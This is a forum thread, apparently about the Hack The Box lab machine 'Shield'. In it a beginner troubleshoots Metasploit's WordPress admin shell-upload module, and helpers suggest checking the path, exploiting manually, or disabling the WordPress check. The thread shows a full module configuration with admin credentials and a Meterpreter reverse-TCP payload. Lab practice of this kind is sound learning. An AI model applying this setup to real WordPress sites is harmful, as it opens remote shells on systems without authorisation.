SHIELD - Metasploit : The target does not appear to be using WordPress

Hi!
Firstly, sorry for all the mistakes in English I’m going to make… (French dude & noob pentester)

I’m having an issue with Metasploit when I try to use wp_admin_shell_upload.

Show options output: (LHost IP hidden)

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   P@s5w0rd!        yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.29      yes       The target host(s), range CIDR identifier, or hosts file with syntax
                                          'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress                yes       The base path to the wordpress application
   USERNAME   admin            yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.XXX     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress

Run output: (LHost IP hidden)

[*] Started reverse TCP handler on 10.10.14.XXX:4444 
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.

I saw in many threads that it can be a problem with LHOST, so I changed it to the OpenVPN one.
I also saw another point about my firewall, but I work on macOS Big Sur and I don’t really know how to fix it. I tried to disable it but it’s no better…

Thanks a lot

PS: I don’t want to use Parrot or Kali in a VBox; I am in a network class with my Mac. I’m a dumbass, I know.

Is the TARGETURI correct? Is WordPress running on http://10.10.10.29/wordpress?

Many walkthroughs use /wordpress for TARGETURI, and http://10.10.10.29/wordpress works fine, so I think it’s good.

> @TazWake said:
> Is the TARGETURI correct? Is WordPress running on http://10.10.10.29/wordpress?

> @Mastau said:
> Many walkthroughs use /wordpress for TARGETURI, and http://10.10.10.29/wordpress works fine, so I think it’s good.

Ok. MSF is saying that whatever you are pointing it at isn’t running WordPress.

Can you log in manually at: http://10.10.10.29/wordpress/wp-login.php ?

Yup

> @TazWake said:
> > @Mastau said:
> > Many walkthroughs use /wordpress for TARGETURI, and http://10.10.10.29/wordpress works fine, so I think it’s good.
>
> Ok. MSF is saying that whatever you are pointing it at isn’t running WordPress.
>
> Can you log in manually at: http://10.10.10.29/wordpress/wp-login.php ?

> @Mastau said:
> Yup

Ok, so you might have to go for a manual exploit then. If MSF can’t see WordPress running, it can’t exploit it.

Okay, I’ll try it.

> @TazWake said:
> > @Mastau said:
> > Yup
>
> Ok, so you might have to go for a manual exploit then. If MSF can’t see WordPress running, it can’t exploit it.

You can also disable the test for WordPress and run it. The blog post VulnHub ‘Mr.Robot 1’ - CTF - Jack Hacks has an example where disabling the test helped. But you still need to add a “firewall rule”; disabling isn’t always the best idea. In System Settings > Security & Privacy > Firewall, you can add an app (Metasploit).